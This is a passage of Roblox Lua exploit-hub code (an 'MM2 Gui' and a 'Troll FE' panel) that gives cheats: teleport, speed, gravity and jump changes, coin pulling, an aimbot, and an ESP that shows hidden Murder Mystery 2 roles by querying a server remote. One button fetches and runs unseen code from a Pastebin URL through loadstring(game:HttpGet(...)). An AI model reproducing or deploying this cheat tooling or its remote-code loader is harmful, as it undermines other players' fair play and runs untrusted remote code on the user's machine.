Player" maintab.title.TextSize = 19 end) --mygui.maintab.bodyframe.menuframe.tpbuttonframe.tpbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() tpbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (tpbutton.AbsolutePosition.X) local y = (mouse.Y) - (tpbutton.AbsolutePosition.Y) tpbutton.tpbuttonlabel.Position = UDim2.new(0,x,0,y) tpbutton.tpbuttonlabel.Size = UDim2.new(0,0,0,0) tpbutton.tpbuttonlabel.ImageTransparency = 0.8 tpbutton.tpbuttonlabel.Visible = true wait() tpbutton.tpbuttonlabel:TweenSize( UDim2.new(0,75,0,75), "Out", "Quint", 0.9 ) end) tpbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = tpbutton.tpbuttonlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.menuframe.tptextbox.matscript --[[tptextbox.Focused:connect(function() local mouse = game:GetService("Players").LocalPlayer:GetMouse() tptextbox.tpunderline.BackgroundTransparency = 0 local x = (mouse.X) - (tpbutton.AbsolutePosition.X) tpunderline.Position = UDim2.new(0,x,0,30) --insert correct offset in Y!! wait() tptextbox.tpunderline:TweenSizeAndPosition( UDim2.new(0,156,0,2), UDim2.new(0,0,0,30), "Out", "Quint", 0.2 ) end)]]-- --mygui.maintab.backbutton1.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() backbutton1.MouseButton1Down:connect(function() backbutton1.backbutton1label.Position = UDim2.new(0.5,0,0.5,0) backbutton1.backbutton1label.Size = UDim2.new(0,0,0,0) backbutton1.backbutton1label.ImageTransparency = 0.8 backbutton1.backbutton1label.Visible = true wait() backbutton1.backbutton1label:TweenSize( UDim2.new(0,60,0,60), "Out", "Quint", 0.25 ) end) backbutton1.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = backbutton1.backbutton1label local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.backbutton1.TransitionScript backbutton1.MouseButton1Click:connect(function() wait(0.2) menuframe:TweenPosition( UDim2.new(0,0,0,0), "Out", "Quint", 0.2 ) generalframe:TweenPosition( UDim2.new(0,256,0,0), "Out", "Quint", 0.2 ) backbutton1.Visible = false backbutton1.Active = false maintab.title.Text = "MM2 Gui" maintab.title.TextSize = 20 end) --mygui.maintab.backbutton2.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() backbutton2.MouseButton1Down:connect(function() backbutton2.backbutton2label.Position = UDim2.new(0.5,0,0.5,0) backbutton2.backbutton2label.Size = UDim2.new(0,0,0,0) backbutton2.backbutton2label.ImageTransparency = 0.8 backbutton2.backbutton2label.Visible = true wait() backbutton2.backbutton2label:TweenSize( UDim2.new(0,60,0,60), "Out", "Quint", 0.25 ) end) backbutton2.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = backbutton2.backbutton2label local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.backbutton2.TransitionScript backbutton2.MouseButton1Click:connect(function() wait(0.2) menuframe:TweenPosition( UDim2.new(0,0,0,0), "Out", "Quint", 0.2 ) lpframe:TweenPosition( UDim2.new(0,256,0,0), "Out", "Quint", 0.2 ) backbutton2.Visible = false backbutton2.Active = false backbutton2.Parent.title.Text = "MM2 Gui" backbutton2.Parent.title.TextSize = 20 end) --mygui.maintab.creditsbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() creditsbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (creditsbutton.AbsolutePosition.X) local y = (mouse.Y) - (creditsbutton.AbsolutePosition.Y) creditsbutton.creditsiconlabel1.Position = UDim2.new(0,x,0,y) creditsbutton.creditsiconlabel1.Size = UDim2.new(0,0,0,0) creditsbutton.creditsiconlabel1.ImageTransparency = 0.8 creditsbutton.creditsiconlabel1.Visible = true wait() creditsbutton.creditsiconlabel1:TweenSize( UDim2.new(0,75,0,75), "Out", "Quint", 0.9 ) end) creditsbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = creditsbutton.creditsiconlabel1 local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.creditsbutton.CreditsWindowScript creditsbutton.MouseButton1Click:connect(function() creditstab.Visible = true creditstab.Active = true end) --mygui.creditstab.closecredits.Script closecredits.MouseButton1Click:connect(function() creditstab.Visible = false creditstab.Active = false end) --mygui.toggle.closeopen.CloseOpenScript closeopen.MouseButton1Click:connect(function() if (maintab.Visible == true) and (maintab.Active == true) then maintab.Visible = false maintab.Active = false closeopen.Text = "Open" else maintab.Visible = true maintab.Active = true closeopen.Text = "Close" end end) --mygui.toggle.closeopen.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() closeopen.MouseButton1Down:connect(function() local x = (mouse.X) - (closeopen.AbsolutePosition.X) local y = (mouse.Y) - (closeopen.AbsolutePosition.Y) closeopen.closeopenlabel.Position = UDim2.new(0,x,0,y) closeopen.closeopenlabel.Size = UDim2.new(0,50,0,50) closeopen.closeopenlabel.ImageTransparency = 0.8 closeopen.closeopenlabel.Visible = true wait() closeopen.closeopenlabel:TweenSize( UDim2.new(0,240,0,240), "Out", "Quint", 1 ) end) closeopen.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = closeopen.closeopenlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.toggle.closeall.Script closeall.MouseButton1Click:connect(function() mygui:Remove() end) -- Scripts lpgravbutton.MouseButton1Down:connect(function() if game:GetService("Workspace").Gravity > 196.1 then game:GetService("Workspace").Gravity = 50 else game:GetService("Workspace").Gravity = 196.2 end end) lpwalkbutton.MouseButton1Down:connect(function() if game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed == 16 then game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 * 5 else game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 end end) lpjumpbutton.MouseButton1Down:connect(function() if game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower == 50 then game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 100 else game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 50 end end) lpgodbutton.MouseButton1Down:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid:Remove() Instance.new('Humanoid', game:GetService("Players").LocalPlayer.Character) end) generallobbybutton.MouseButton1Down:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-109.56, 140, -11.75) + Vector3.new(1, 0, 0) end) generalgunbutton.MouseButton1Down:connect(function() game:GetService("Workspace").GunDrop.CFrame = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame + Vector3.new(2,0,0) end) generalcoinbutton.MouseButton1Down:connect(function() for i = 10, 1, -1 do for i,v in pairs(game:GetService("Workspace"):GetChildren()) do local s = v:FindFirstChild("CoinContainer") local e = game:GetService("Players").LocalPlayer.Character:FindFirstChild("Torso") if e and s then for i,c in pairs(s:GetChildren()) do c.CFrame = game:GetService("Players").LocalPlayer.Character.Torso.CFrame end end end wait(0.7) end end) --[[tpbutton.MouseButton1Down:connect(function() for i,v in pairs(game:GetService("Workspace"):GetChildren()) do if tptextbox.Text:lower() == v.Name:lower() then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[v.Name].HumanoidRootPart.CFrame else print("Player not found") end end end)]]-- --script local parent = tptextbox --insert textbox name! local mouse = game:GetService("Players").LocalPlayer:GetMouse() local xsize = parent.Size.X.Offset local ysize = parent.Size.Y.Offset parent.Visible = true parent.Active = true parent.Selectable = true local Underline = Instance.new("Frame") local UnderlineBase = Instance.new("Frame") Underline.Name = "Underline" Underline.Parent = parent Underline.BackgroundColor3 = parent.TextColor3 Underline.BorderSizePixel = 0 Underline.Position = UDim2.new(0, 0, 1, 0) Underline.Size = UDim2.new(0, 0, 0, 1) UnderlineBase.Name = "UnderlineBase" UnderlineBase.Parent = parent UnderlineBase.BackgroundColor3 = parent.TextColor3 UnderlineBase.BackgroundTransparency = 0.85 UnderlineBase.BorderSizePixel = 0 UnderlineBase.Position = UDim2.new(0, 0, 1, 0) UnderlineBase.Size = UDim2.new(0, xsize, 0, 1) parent.Focused:connect(function() local x = (mouse.X) - (parent.AbsolutePosition.X) Underline.BackgroundTransparency = 0 Underline.Position = UDim2.new(0,x,1,0) wait() Underline:TweenSizeAndPosition( UDim2.new(0, xsize, 0, 1), UDim2.new(0, 0, 1, 0), "Out", "Quint", 0.2 ) end) parent.FocusLost:connect(function(enterPressed) if parent.Text == "" then parent.Text = "Player Name" end local TweenService = game:GetService("TweenService") local Info = TweenInfo.new( 0.15, Enum.EasingStyle.Linear, Enum.EasingDirection.Out, 0, false, 0 ) local Goals = { BackgroundTransparency = 1; } local tween = TweenService:Create(Underline,Info,Goals) tween:Play() wait(0.15) Underline.Size = UDim2.new(0,0,0,1) if enterPressed then for i,v in pairs(game:GetService("Workspace"):GetChildren()) do if tptextbox.Text:lower() == v.Name:lower() then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[v.Name].HumanoidRootPart.CFrame else print("Player not found") end end print(true) elseif tptextbox.Text ~= "Player Name" then tptextbox.Text = "Press Enter to TP" end end) --/script if enterPressed then for i,v in pairs(game:GetService("Workspace"):GetChildren()) do if tptextbox.Text:lower() == v.Name:lower() then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[v.Name].HumanoidRootPart.CFrame else print("Player not found") end end end generalespbutton.MouseButton1Down:connect(function() --credits to Nebula Hub for the esp + aimbot PLAYER = game:GetService("Players").LocalPlayer MOUSE = PLAYER:GetMouse() CC = game:GetService("Workspace").CurrentCamera ENABLED = false ESP_ENABLED = false _G.FREE_FOR_ALL = true _G.BIND = 50 _G.ESP_BIND = 52 _G.CHANGE_AIM = 'q' _G.AIM_AT = 'Head' wait(1) function GetNearestPlayerToMouse() local PLAYERS = {} local PLAYER_HOLD = {} local DISTANCES = {} for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v ~= PLAYER then table.insert(PLAYERS, v) end end for i, v in pairs(PLAYERS) do if _G.FREE_FOR_ALL == false then if v and (v.Character) ~= nil and v.TeamColor ~= PLAYER.TeamColor then local AIM = v.Character:FindFirstChild(_G.AIM_AT) if AIM ~= nil then local DISTANCE = (AIM.Position - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p).magnitude local RAY = Ray.new(game:GetService("Workspace").CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE) local HIT,POS = game:GetService("Workspace"):FindPartOnRay(RAY, game:GetService("Workspace")) local DIFF = math.floor((POS - AIM.Position).magnitude) PLAYER_HOLD[v.Name .. i] = {} PLAYER_HOLD[v.Name .. i].dist = DISTANCE PLAYER_HOLD[v.Name .. i].plr = v PLAYER_HOLD[v.Name .. i].diff = DIFF table.insert(DISTANCES, DIFF) end end elseif _G.FREE_FOR_ALL == true then local AIM = v.Character:FindFirstChild(_G.AIM_AT) if AIM ~= nil then local DISTANCE = (AIM.Position - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p).magnitude local RAY = Ray.new(game:GetService("Workspace").CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE) local HIT,POS = game:GetService("Workspace"):FindPartOnRay(RAY, game:GetService("Workspace")) local DIFF = math.floor((POS - AIM.Position).magnitude) PLAYER_HOLD[v.Name .. i] = {} PLAYER_HOLD[v.Name .. i].dist = DISTANCE PLAYER_HOLD[v.Name .. i].plr = v PLAYER_HOLD[v.Name .. i].diff = DIFF table.insert(DISTANCES, DIFF) end end end if unpack(DISTANCES) == nil then return false end local L_DISTANCE = math.floor(math.min(unpack(DISTANCES))) if L_DISTANCE > 20 then return false end for i, v in pairs(PLAYER_HOLD) do if v.diff == L_DISTANCE then return v.plr end end return false end GUI_MAIN = Instance.new('ScreenGui', game:GetService("CoreGui")) GUI_TARGET = Instance.new('TextLabel', GUI_MAIN) GUI_AIM_AT = Instance.new('TextLabel', GUI_MAIN) GUI_MAIN.Name = 'AIMBOT' GUI_TARGET.Size = UDim2.new(0,200,0,30) GUI_TARGET.BackgroundTransparency = 0.5 GUI_TARGET.BackgroundColor = BrickColor.new('Fossil') GUI_TARGET.BorderSizePixel = 0 GUI_TARGET.Position = UDim2.new(0.5,-100,0,0) GUI_TARGET.Text = 'AIMBOT : OFF' GUI_TARGET.TextColor3 = Color3.new(1,1,1) GUI_TARGET.TextStrokeTransparency = 1 GUI_TARGET.TextWrapped = true GUI_TARGET.FontSize = 'Size24' GUI_TARGET.Font = 'SourceSansBold' GUI_AIM_AT.Size = UDim2.new(0,200,0,20) GUI_AIM_AT.BackgroundTransparency = 0.5 GUI_AIM_AT.BackgroundColor = BrickColor.new('Fossil') GUI_AIM_AT.BorderSizePixel = 0 GUI_AIM_AT.Position = UDim2.new(0.5,-100,0,30) GUI_AIM_AT.Text = 'AIMING : HEAD' GUI_AIM_AT.TextColor3 = Color3.new(1,1,1) GUI_AIM_AT.TextStrokeTransparency = 1 GUI_AIM_AT.TextWrapped = true GUI_AIM_AT.FontSize = 'Size18' GUI_AIM_AT.Font = 'SourceSansBold' local TRACK = false function CREATE(BASE, COLOR) local ESP_MAIN = Instance.new('BillboardGui', PLAYER.PlayerGui) local ESP_DOT = Instance.new('Frame', ESP_MAIN) local ESP_NAME = Instance.new('TextLabel', ESP_MAIN) ESP_MAIN.Name = 'ESP' ESP_MAIN.Adornee = BASE ESP_MAIN.AlwaysOnTop = true ESP_MAIN.ExtentsOffset = Vector3.new(0, 1, 0) ESP_MAIN.Size = UDim2.new(0, 5, 0, 5) ESP_DOT.Name = 'DOT' ESP_DOT.BackgroundColor3 = COLOR ESP_DOT.BackgroundTransparency = 0.3 ESP_DOT.BorderSizePixel = 0 ESP_DOT.Position = UDim2.new(-0.5, 0, -0.5, 0) ESP_DOT.Size = UDim2.new(2, 0, 2, 0) ESP_DOT.Visible = true ESP_DOT.ZIndex = 10 ESP_NAME.Name = 'NAME' ESP_NAME.BackgroundColor3 = Color3.new(255, 255, 255) ESP_NAME.BackgroundTransparency = 1 ESP_NAME.BorderSizePixel = 0 ESP_NAME.Position = UDim2.new(0, 0, 0, -40) ESP_NAME.Size = UDim2.new(1, 0, 10, 0) ESP_NAME.Visible = true ESP_NAME.ZIndex = 10 ESP_NAME.Font = 'ArialBold' ESP_NAME.FontSize = 'Size14' ESP_NAME.Text = BASE.Parent.Name:upper() ESP_NAME.TextColor3 = COLOR end function CLEAR() for _,v in pairs(PLAYER.PlayerGui:children()) do if v.Name == 'ESP' and v:IsA('BillboardGui') then v:Destroy() end end end local Remote = game:service'ReplicatedStorage'.GetPlayerData local player_roles = Remote:InvokeServer() function FIND() CLEAR() TRACK = true spawn(function() while wait() do if TRACK then CLEAR() local a,b = ypcall(function() for name,player in pairs(player_roles)do if game:service'Players':FindFirstChild(name) ~= nil then local v = game:service'Players':FindFirstChild(name) if v.Character and v.Character:FindFirstChild('Head') then if v.Character:FindFirstChild('Head') then if player.Dead ~= true then if player.Role == "Murderer"then CREATE(v.Character.Head, Color3.new(1,0,0)) elseif player.Role == "Sheriff" or player.Role == "Hero" then CREATE(v.Character.Head, Color3.new(0,0,1)) else CREATE(v.Character.Head, Color3.new(0,1,0)) end end end end end end end) end end wait(1) end) end coroutine.wrap(function() while wait()do player_roles = Remote:InvokeServer() end end)() MOUSE.KeyDown:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.BIND then ENABLED = true end end) MOUSE.KeyUp:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.BIND then ENABLED = false end end) MOUSE.KeyDown:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.ESP_BIND then if ESP_ENABLED == false then FIND() ESP_ENABLED = true print('ESP : ON') elseif ESP_ENABLED == true then wait() CLEAR() TRACK = false ESP_ENABLED = false print('ESP : OFF') end end end) MOUSE.KeyDown:connect(function(KEY) if KEY == _G.CHANGE_AIM then if _G.AIM_AT == 'Head' then _G.AIM_AT = 'Torso' GUI_AIM_AT.Text = 'AIMING : TORSO' elseif _G.AIM_AT == 'Torso' then _G.AIM_AT = 'Head' GUI_AIM_AT.Text = 'AIMING : HEAD' end end end) game:GetService('RunService').RenderStepped:connect(function() if ENABLED then local TARGET = GetNearestPlayerToMouse() if (TARGET ~= false) then local AIM = TARGET.Character:FindFirstChild(_G.AIM_AT) if AIM then CC.CoordinateFrame = CFrame.new(CC.CoordinateFrame.p, AIM.CFrame.p) end GUI_TARGET.Text = 'AIMBOT : '.. TARGET.Name:sub(1, 5) else GUI_TARGET.Text = 'AIMBOT : OFF' end end end) repeat wait() if ESP_ENABLED == true then FIND() end until ESP_ENABLED == false wait() _G.FREE_FOR_ALL = true _G.BIND = 50 -- LEFT CTRL _G.ESP_BIND = 52 -- LEFT ALT end) local plr = game:GetService("Players").LocalPlayer plr:GetMouse().KeyDown:connect(function(KeyUp) if KeyUp == "0" then plr.Character.Humanoid.WalkSpeed = 35 end end) plr:GetMouse().KeyUp:connect(function(KeyUp) if KeyUp == "0" then plr.Character.Humanoid.WalkSpeed = 16 end end) end) strucid.Name = "strucid" strucid.Parent = Main strucid.BackgroundColor3 = Color3.new(1, 1, 1) strucid.Position = UDim2.new(0.325179845, 0, 0.785467148, 0) strucid.Size = UDim2.new(0, 200, 0, 25) strucid.Font = Enum.Font.SourceSans strucid.Text = "Strucid (V/Q)" strucid.TextColor3 = Color3.new(0, 0, 0) strucid.TextSize = 25 strucid.MouseButton1Down:connect(function() -- press v to use aimbot and press q to disable aimbot loadstring(game:HttpGet("https://pastebin.com/raw/uw2P2fbY", true))() PLAYER = game:GetService("Players").LocalPlayer MOUSE = PLAYER:GetMouse() CC = game:GetService("Workspace").CurrentCamera ENABLED = false ESP_ENABLED = false _G.FREE_FOR_ALL = false _G.BIND = 118 _G.ESP_BIND = 49 _G.CHANGE_AIM = 'q' _G.AIM_AT = 'Head' wait(1) function GetNearestPlayerToMouse() local PLAYERS = {} local PLAYER_HOLD = {} local DISTANCES = {} for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v ~= PLAYER then table.insert(PLAYERS, v) end end for i, v in pairs(PLAYERS) do if _G.FREE_FOR_ALL == false then if v and (v.Character) ~= nil and v.TeamColor ~= PLAYER.TeamColor then local AIM = v.Character:FindFirstChild(_G.AIM_AT) if AIM ~= nil then local DISTANCE = (AIM.Position - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p).magnitude local RAY = Ray.new(game:GetService("Workspace").CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE) local HIT,POS = game:GetService("Workspace"):FindPartOnRay(RAY, game:GetService("Workspace")) local DIFF = math.floor((POS - AIM.Position).magnitude) PLAYER_HOLD[v.Name .. i] = {} PLAYER_HOLD[v.Name .. i].dist = DISTANCE PLAYER_HOLD[v.Name .. i].plr = v PLAYER_HOLD[v.Name .. i].diff = DIFF table.insert(DISTANCES, DIFF) end end elseif _G.FREE_FOR_ALL == true then local AIM = v.Character:FindFirstChild(_G.AIM_AT) if AIM ~= nil then local DISTANCE = (AIM.Position - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p).magnitude local RAY = Ray.new(game:GetService("Workspace").CurrentCamera.CoordinateFrame.p, (MOUSE.Hit.p - CC.CoordinateFrame.p).unit * DISTANCE) local HIT,POS = game:GetService("Workspace"):FindPartOnRay(RAY, game:GetService("Workspace")) local DIFF = math.floor((POS - AIM.Position).magnitude) PLAYER_HOLD[v.Name .. i] = {} PLAYER_HOLD[v.Name .. i].dist = DISTANCE PLAYER_HOLD[v.Name .. i].plr = v PLAYER_HOLD[v.Name .. i].diff = DIFF table.insert(DISTANCES, DIFF) end end end if unpack(DISTANCES) == nil then return false end local L_DISTANCE = math.floor(math.min(unpack(DISTANCES))) if L_DISTANCE > 20 then return false end for i, v in pairs(PLAYER_HOLD) do if v.diff == L_DISTANCE then return v.plr end end return false end GUI_MAIN = Instance.new('ScreenGui', game:GetService("CoreGui")) GUI_TARGET = Instance.new('TextLabel', GUI_MAIN) GUI_AIM_AT = Instance.new('TextLabel', GUI_MAIN) GUI_MAIN.Name = 'AIMBOT' GUI_TARGET.Size = UDim2.new(0,200,0,30) GUI_TARGET.BackgroundTransparency = 0.5 GUI_TARGET.BackgroundColor = BrickColor.new('Fossil') GUI_TARGET.BorderSizePixel = 0 GUI_TARGET.Position = UDim2.new(0.5,-100,0,0) GUI_TARGET.Text = 'AIMBOT : OFF' GUI_TARGET.TextColor3 = Color3.new(1,1,1) GUI_TARGET.TextStrokeTransparency = 1 GUI_TARGET.TextWrapped = true GUI_TARGET.FontSize = 'Size24' GUI_TARGET.Font = 'SourceSansBold' GUI_AIM_AT.Size = UDim2.new(0,200,0,20) GUI_AIM_AT.BackgroundTransparency = 0.5 GUI_AIM_AT.BackgroundColor = BrickColor.new('Fossil') GUI_AIM_AT.BorderSizePixel = 0 GUI_AIM_AT.Position = UDim2.new(0.5,-100,0,30) GUI_AIM_AT.Text = 'AIMING : HEAD' GUI_AIM_AT.TextColor3 = Color3.new(1,1,1) GUI_AIM_AT.TextStrokeTransparency = 1 GUI_AIM_AT.TextWrapped = true GUI_AIM_AT.FontSize = 'Size18' GUI_AIM_AT.Font = 'SourceSansBold' local TRACK = false function CREATE(BASE, TEAM) local ESP_MAIN = Instance.new('BillboardGui', PLAYER.PlayerGui) local ESP_DOT = Instance.new('Frame', ESP_MAIN) local ESP_NAME = Instance.new('TextLabel', ESP_MAIN) ESP_MAIN.Name = 'ESP' ESP_MAIN.Adornee = BASE ESP_MAIN.AlwaysOnTop = true ESP_MAIN.ExtentsOffset = Vector3.new(0, 1, 0) ESP_MAIN.Size = UDim2.new(0, 5, 0, 5) ESP_DOT.Name = 'DOT' ESP_DOT.BackgroundColor = BrickColor.new('Bright red') ESP_DOT.BackgroundTransparency = 0.3 ESP_DOT.BorderSizePixel = 0 ESP_DOT.Position = UDim2.new(-0.5, 0, -0.5, 0) ESP_DOT.Size = UDim2.new(2, 0, 2, 0) ESP_DOT.Visible = true ESP_DOT.ZIndex = 10 ESP_NAME.Name = 'NAME' ESP_NAME.BackgroundColor3 = Color3.new(255, 255, 255) ESP_NAME.BackgroundTransparency = 1 ESP_NAME.BorderSizePixel = 0 ESP_NAME.Position = UDim2.new(0, 0, 0, -40) ESP_NAME.Size = UDim2.new(1, 0, 10, 0) ESP_NAME.Visible = true ESP_NAME.ZIndex = 10 ESP_NAME.Font = 'ArialBold' ESP_NAME.FontSize = 'Size14' ESP_NAME.Text = BASE.Parent.Name:upper() ESP_NAME.TextColor = BrickColor.new('Bright red') end function CLEAR() for _,v in pairs(PLAYER.PlayerGui:children()) do if v.Name == 'ESP' and v:IsA('BillboardGui') then v:Destroy() end end end function FIND() CLEAR() TRACK = true spawn(function() while wait() do if TRACK then CLEAR() for i,v in pairs(game:GetService("Players"):GetChildren()) do if v.Character and v.Character:FindFirstChild('Head') then if _G.FREE_FOR_ALL == false then if v.TeamColor ~= PLAYER.TeamColor then if v.Character:FindFirstChild('Head') then CREATE(v.Character.Head, true) end end else if v.Character:FindFirstChild('Head') then CREATE(v.Character.Head, true) end end end end end end wait(1) end) end MOUSE.KeyDown:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.BIND then ENABLED = true end end) MOUSE.KeyUp:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.BIND then ENABLED = false end end) MOUSE.KeyDown:connect(function(KEY) KEY = KEY:lower():byte() if KEY == _G.ESP_BIND then if ESP_ENABLED == false then FIND() ESP_ENABLED = true print('ESP : ON') elseif ESP_ENABLED == true then wait() CLEAR() TRACK = false ESP_ENABLED = true print('ESP : OFF') end end end) MOUSE.KeyDown:connect(function(KEY) if KEY == _G.CHANGE_AIM then if _G.AIM_AT == 'Head' then _G.AIM_AT = 'Torso' GUI_AIM_AT.Text = 'AIMING : TORSO' elseif _G.AIM_AT == 'Torso' then _G.AIM_AT = 'Head' GUI_AIM_AT.Text = 'AIMING : HEAD' end end end) game:GetService('RunService').RenderStepped:connect(function() if ENABLED then local TARGET = GetNearestPlayerToMouse() if (TARGET ~= false) then local AIM = TARGET.Character:FindFirstChild(_G.AIM_AT) if AIM then CC.CoordinateFrame = CFrame.new(CC.CoordinateFrame.p, AIM.CFrame.p) end GUI_TARGET.Text = 'AIMBOT : '.. TARGET.Name:sub(1, 5) else GUI_TARGET.Text = 'AIMBOT : OFF' end end end) repeat wait() if ESP_ENABLED == true then FIND() end until ESP_ENABLED == false wait() _G.FREE_FOR_ALL = false _G.BIND = 118 -- LEFT ALT _G.ESP_BIND = 49 -- RIGHT CTRL end) TextLabel_3.Parent = Main TextLabel_3.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) TextLabel_3.BorderSizePixel = 0 TextLabel_3.Position = UDim2.new(0.860108852, 0, 0.235294119, 0) TextLabel_3.Size = UDim2.new(0, 97, 0, 196) TextLabel_3.Font = Enum.Font.SourceSansBold TextLabel_3.Text = "Thank you for using TRINIT!" TextLabel_3.TextColor3 = Color3.new(0, 0, 0) TextLabel_3.TextSize = 20 TextLabel_3.TextWrapped = true end }) GUIS:AddButton({ Title = "Troll FE V1", Description = "Troll FE V1", Callback = function() -- Objects local FEGui = Instance.new("ScreenGui") local MainBody = Instance.new("Frame") local Title = Instance.new("Frame") local Bottom = Instance.new("Frame") local TextLabel = Instance.new("TextLabel") local Animations = Instance.new("TextButton") local CreeperR6 = Instance.new("TextButton") local CreeperR15 = Instance.new("TextButton") local AnimationsR15 = Instance.new("TextButton") local FEDropHats = Instance.new("TextButton") local NoLimbs = Instance.new("TextButton") local FEbtools = Instance.new("TextButton") local FlyR6 = Instance.new("TextButton") local FEinvisible = Instance.new("TextButton") local Glitchmax = Instance.new("TextButton") local FEFloatinghead = Instance.new("TextButton") local Inform = Instance.new("TextButton") local TextLabel_2 = Instance.new("TextLabel") -- Properties FEGui.Name = "FE Gui" FEGui.Parent = game:GetService("Players").LocalPlayer.PlayerGui FEGui.ResetOnSpawn = false MainBody.Name = "Main Body" MainBody.Parent = FEGui MainBody.Active = true MainBody.BackgroundColor3 = Color3.new(0, 0, 0) MainBody.Draggable = true MainBody.Position = UDim2.new(0.536635697, 0, 0.0425101332, 0) MainBody.Size = UDim2.new(0, 353, 0, 270) Title.Name = "Title" Title.Parent = MainBody Title.BackgroundColor3 = Color3.new(0.0313726, 0.321569, 1) Title.Position = UDim2.new(0.000818580389, 0, -0.000419855118, 0) Title.Size = UDim2.new(0, 353, 0, 27) Bottom.Name = "Bottom" Bottom.Parent = MainBody Bottom.BackgroundColor3 = Color3.new(0.0235294, 0.627451, 1) Bottom.Position = UDim2.new(0.000818580389, 0, 0.0986804739, 0) Bottom.Size = UDim2.new(0, 353, 0, 16) TextLabel.Parent = MainBody TextLabel.BackgroundColor3 = Color3.new(0.0313726, 0.321569, 1) TextLabel.BorderSizePixel = 0 TextLabel.Size = UDim2.new(0, 200, 0, 19) TextLabel.Font = Enum.Font.SourceSansBold TextLabel.Text = "Troll FE" TextLabel.TextColor3 = Color3.new(1, 1, 1) TextLabel.TextSize = 14 TextLabel.TextWrapped = true TextLabel.TextXAlignment = Enum.TextXAlignment.Left Animations.Name = "Animations" Animations.Parent = MainBody Animations.BackgroundColor3 = Color3.new(0, 0.615686, 1) Animations.Position = UDim2.new(0.698873341, 0, 0.194331974, 0) Animations.Size = UDim2.new(0, 106, 0, 27) Animations.Font = Enum.Font.SciFi Animations.Text = "Animations" Animations.TextColor3 = Color3.new(1, 1, 1) Animations.TextSize = 14 Animations.MouseButton1Down:connect(function() local Gui = Instance.new("ScreenGui", game:GetService("CoreGui")) Gui.Name = "FE Animations" local Background = Instance.new("Frame",Gui) Background.Name = "Background" Background.Active = true Background.BackgroundColor3 = Color3.fromRGB(220,220,255) Background.Transparency = 0.3 Background.BorderSizePixel = 5 Background.Draggable = true Background.Position = UDim2.new(0,300,0,300) Background.Size = UDim2.new(0,345,0,190) local Title = Instance.new("TextLabel",Background) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0,0,0,-80) Title.Size = UDim2.new(0,290,1,0) Title.Font = "SourceSansLight" Title.FontSize = "Size18" Title.Text = "FE Animations [by illremember]" Title.TextColor3 = Color3.fromRGB(20,20,25) local Chop = Instance.new("TextButton", Background) Chop.Name = "Chop" Chop.BackgroundColor3 = Color3.fromRGB(20,20,20) Chop.BackgroundTransparency = 0.1 